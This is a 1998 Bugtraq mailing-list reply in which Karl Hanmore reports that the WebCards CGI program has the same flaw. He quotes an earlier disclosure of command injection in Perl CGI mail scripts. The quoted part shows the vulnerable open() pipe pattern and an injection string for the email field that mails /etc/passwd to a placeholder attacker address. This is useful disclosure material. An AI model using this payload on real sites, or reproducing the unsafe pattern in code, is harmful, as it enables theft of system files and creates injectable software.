[8485] in bugtraq
Re: Several new CGI vulnerabilities
daemon@ATHENA.MIT.EDU (Karl Hanmore)
Tue Nov 10 16:14:24 1998
Date: Tue, 10 Nov 1998 18:45:24 +1000
Reply-To: Karl Hanmore <avatar@ULTRA.ULTRA.NET.AU>
From: Karl Hanmore <avatar@ULTRA.ULTRA.NET.AU>
X-To: xnec <xnec@WINTERMUTE.LINUX.TC>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199811100026.SAA26763@wintermute.linux.tc>
G'day,
As a related note, the WebCards program (V1.6) by Sam Kareem
(webmaster@iraq.net) is subject to the same vunerability.
Regards,
Karl
On Mon, 9 Nov 1998, xnec wrote:
> INFO:
> After looking over the perl-CGI scripts on www.cgi-resources.com,
> I've discovered vulnerabilities in the following:
>
-----Snip----8<-----------------
>
> EXPLOIT:
>
> Each of these are exploitable by inputing metacharacters into the
> recipient's email address. Each script calls something similar
> to:
>
> open( MAIL, "|$mailprog $email" )
> # this particular line is from the LakeWeb scripts
>
> The exploit strings are simple, something like
> &mail evil@foobar.com < /etc/passwd&@host.com will work for each script
> (the @host.com is necessary because some hosts check for "@" and ".")
> when placed in the Recipient Email field.
>
-----Snip-----8<---------------
